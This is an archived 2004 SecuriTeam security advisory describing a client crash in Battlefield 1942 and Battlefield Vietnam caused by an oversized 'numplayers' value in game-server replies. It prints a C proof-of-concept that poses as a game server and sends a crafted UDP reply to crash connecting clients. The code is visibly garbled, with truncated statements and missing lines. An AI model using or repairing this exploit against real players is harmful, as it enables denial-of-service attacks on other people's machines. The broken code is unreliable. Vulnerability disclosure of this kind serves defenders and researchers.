[NT] Battlefield 1942 and Vietnam Broadcast Client Crash

From: SecuriTeam (support_at_securiteam.com)
Date: 12/12/04

  • Next message: SecuriTeam: "[NT] Remote Execute DoS Attack Leads to Client Crash"
    To: list@securiteam.com
    Date: 12 Dec 2004 10:28:14 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.

    - - - - - - - - -

      Battlefield 1942 and Vietnam Broadcast Client Crash


    Battlefield 1942 and Vietnam are two of the most known and played FPS
    games based on the relative military conflicts. They are developed by
    <http://www.dice.se> Digital Illusions and have been released respectively
    at September 2002 and March 2004.

    A vulnerability in the way Battlefield 1942 and Vietnam parsers incoming
    data allows an attacker to cause the program to crash.


    Vulnerable Systems:
     * Battlefield 1942 versions 1.6.19 and prior
     * Battlefield Vietnam versions 1.2 and prior

    Immune Systems:
     * Battlefield 1924 version 1.6.1b
     * Battlefield Vietnam version 1.21b

    Just like any other multiplayer server, Battlefield contacts a master
    server and queries it in order to discover the existence of other game
    servers. The client then queries each of the game servers for information
    about games which is displayed in the in-game display browser.

    A problem exists while parsing replies from game servers. When a very
    large number of players ("numplayers" parameter) is reported to the
    client, by a server, the client freezes completely and a few seconds later
    will generate a fault due to an access to a NULL pointer.

    This is a passive broadcast attack in which an attacker is able to crash
    any client if the attacker is visible on the game server.

    A proof of concept code for this Denial Of Service vulnerability is listed

    Proof Of Concept

    by Luigi Auriemma


    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #ifdef WIN32
        #include <winsock.h>
        #include "winerr.h"

        #define close closesocket
        #include <unistd.h>
        #include <sys/socket.h>
        #include <sys/types.h>
        #include <arpa/inet.h>
        #include <netinet/in.h>
        #include <netdb.h>

    #define VER "0.1"
    #define BUFFSZ 2048
    #define BOOMPLAYERS 2147483647 /* BUG */
    #define BOOM "\\gamename\\%s" \
                        "\\gamever\\1.6" \
                        "\\location\\0" \
                        "\\hostname\\crash" \
                        "\\hostport\\%d" \
                        "\\mapname\\aberdeen" \
                        "\\numplayers\\%u" \
                        "\\maxplayers\\%u" /* not needed to be the same value
    */ \
                        "\\final\\" \

    void std_err(void);

    int main(int argc, char *argv[]) {
        struct sockaddr_in peer;
        int sd,
                on = 1,
        u_short port;
        u_char buff[BUFFSZ + 1],
                pck[BUFFSZ + 1];

        setbuf(stdout, NULL);

            "Battlefield broadcast client crash "VER"\n"
            " 1942 <= 1.6.19 and Vietnam <= 1.2\n"
            "by Luigi Auriemma\n"
            "e-mail: aluigi@altervista.org\n"
            "web: http://aluigi.altervista.org\n"
            "\n", stdout);

        if(argc < 3) {
                "Usage: %s <game> <port>\n"
                " bfvietnam = Battlefield Vietnam\n"
                " bfield1942 = Battlefield 1942\n"
                " bfield1942sw = Battlefield 1942: Secret Weapons of WW2\n"
                " bfield1942rtr = Battlefield 1942: Road to Rome\n"
                " bfield1942swd = Battlefield 1942: Secret Weapons of WW2
                " bfield1942d = Battlefield 1942 Demo\n"
                " 23000 = default Internet port\n"
                " 22000 = default LAN port\n"
                "\n", argv[0]);

    #ifdef WIN32
        WSADATA wsadata;
        WSAStartup(MAKEWORD(1,0), &wsadata);

        port = atoi(argv[2]);

        peer.sin_addr.s_addr = INADDR_ANY;
        peer.sin_port = htons(port);
        peer.sin_family = AF_INET;
        psz = sizeof(peer);

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();

        if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
          < 0) std_err();
        if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();

        pcklen = snprintf(
        if((pcklen < 0) || (pcklen > BUFFSZ)) exit(1);

        fputs("Clients:\n", stdout);
        for(;;) {
            len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer,
            if(len < 0) continue;
            buff[len] = 0x00;

            printf("%16s:%5hu %s\n",
                inet_ntoa(peer.sin_addr), ntohs(peer.sin_port),

            if(sendto(sd, pck, pcklen, 0, (struct sockaddr *)&peer,
              < 0) std_err();


    #ifndef WIN32
        void std_err(void) {


    The information has been provided by <mailto:aluigi@autistici.org> Luigi


    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Remote Execute DoS Attack Leads to Client Crash"